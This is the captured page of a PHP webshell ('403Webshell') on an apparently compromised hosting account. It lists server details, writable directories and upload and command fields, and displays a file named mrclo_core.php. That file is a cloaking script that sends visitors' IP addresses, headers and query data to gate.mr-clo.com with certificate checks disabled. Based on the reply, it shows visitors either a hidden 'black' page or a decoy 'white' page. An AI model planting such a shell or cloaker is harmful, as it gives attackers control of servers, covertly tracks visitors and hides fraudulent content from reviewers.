403Webshell
Server IP : 162.213.251.208  /  Your IP : 18.216.26.104
Web Server : LiteSpeed
System : Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : jmoroovq ( 1890)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/jmoroovq/trinetskt.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/jmoroovq/trinetskt.com/mrclo_core.php
<?php
// Checking the existence of the main function //
if (!function_exists('mrclo_init')) {

  // Collecting headers //
  function  mrclo_get_headers(){
    $headers = array();
    foreach ($_SERVER as $key => $value) {
      if (!strncmp('HTTP_', $key, 5)) {
        $header = strtr(strtolower(substr($key, 5)), '_', '-');
        $headers[$header] = $value;
      }
    }
    return $headers;
  }
  // Collecting headers //

  // Get the ip address of a site visitor //
  function mrclo_get_ip() {
    $ip = mrclo_combine($_SERVER, array( 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP', ));

    if ($ip !== '') { return strtok($ip, ','); }

    if (array_key_exists('HTTP_FORWARDED', $_SERVER)) {
      $forwarded = $_SERVER['HTTP_FORWARDED'];
      $forwarded = strtok($forwarded, ',');
      $forwarded = explode(';', $forwarded);
      foreach ($forwarded as $for) {
        if (!strncasecmp($for, 'for=', 4)) { $for = explode('=', $for, 2); return mrclo_combine($for, 1); }
      }
    }
    return mrclo_combine($_SERVER, 'REMOTE_ADDR');
  }
  // Get the ip address of a site visitor //


  // Fetching from an array //
  function mrclo_combine($array, $keys, $default = '') {
    if (is_scalar($keys)) { $keys = array($keys); }

    foreach ($keys as $key) {
      if (array_key_exists($key, $array)) { return $array[$key]; }
    }

    return $default;
  }
  // Fetching from an array //

  // We collect material for verification //
  function mrclo_collect_stuff(){

    if($_GET){
      foreach($_GET as $key => $value){
        $_SESSION[$key] = $value;
      }
    }
    $data["utm"]        = json_encode(@$_SESSION);
    $data["query"]      = json_encode($_SERVER['QUERY_STRING']);
    $data["headers"]    = json_encode(mrclo_get_headers());

    return $data;
  }
  // We collect material for verification //

  // We make a request to the server for verification //
  function mrclo_query(){
    $curl = curl_init("https://gate.mr-clo.com/api/v2/handler");
    curl_setopt($curl, CURLOPT_HTTPHEADER, array( 'MrClo-token: ' . TOKEN, 'MrClo-client-ip: ' . mrclo_get_ip(), 'MrClo-revise: ' . REVISE, 'MrClo-mode-button: ' . MODE_BUTTON, 'MrClo-referer-check: ' . REFERER, 'MrClo-utm-check: ' . UTM, 'MrClo-vpn-check: ' . VPN_CHECK, 'MrClo-country-disable: ' . COUNTRY_DISABLE, 'MrClo-block-ios: ' . BLOCKED_IOS ));
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, mrclo_collect_stuff());
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($curl, CURLOPT_TIMEOUT, 60);
    curl_setopt($curl, CURLOPT_TIMEOUT_MS, 4000);
    curl_setopt($curl, CURLOPT_FORBID_REUSE, true);
    $result = curl_exec($curl);
    if(curl_getinfo($curl, CURLINFO_HTTP_CODE)== "404"){ mrclo_handler(WHITE_SETTINGS, WHITE_URL); exit; }
    return json_decode($result);
  }
  // We make a request to the server for verification //
  header('Access-Control-Allow-Origin: *');
  function mrclo_handler($target_settings, $target){
    switch ($target_settings) {
      case 'local':
      if (!function_exists('mime_content_type') || preg_match('/\.(?:php[345]?|phtml)$/', $target)) {
        require_once $target;
      } else {
        header('Content-Type: ' . mime_content_type($target));
        header('Content-Length: ' . filesize($target));
        readfile($target);
      }
      break;
      case 'iframe':
        $target = htmlspecialchars($target);
        if(!empty($_GET)) {
            if(strstr($target,'?')) $target.= '&'.http_build_query($_GET);
            else $target.= '?'.http_build_query($_GET);
        }
        echo "<!DOCTYPE html><iframe src=\"https://{$target}\" style=\"width:100%;height:100%;position:absolute;top:0;left:0;z-index:999999;border:none;\"></iframe>";
          break;
          case 'redirect':
          if(!empty($_GET)) {
              if(strstr($target,'?')) $target.= '&'.http_build_query($_GET);
              else $target.= '?'.http_build_query($_GET);
          }
          header("Location: http://{$target}");
          break;
        }
      }

      // Main handler function //
      function mrclo_init(){
        $query = mrclo_query();
        if($query->mode_button){ return $query->status; }else{
          if($query->status){
            mrclo_handler(BLACK_SETTINGS, BLACK_URL);
          }else{
            mrclo_handler(WHITE_SETTINGS, WHITE_URL);
          }
        }
      }
      // Main handler function //

    }
    // Checking the existence of the main function //
    ?>

Youez - 2016 - github.com/yon3zu
LinuXploit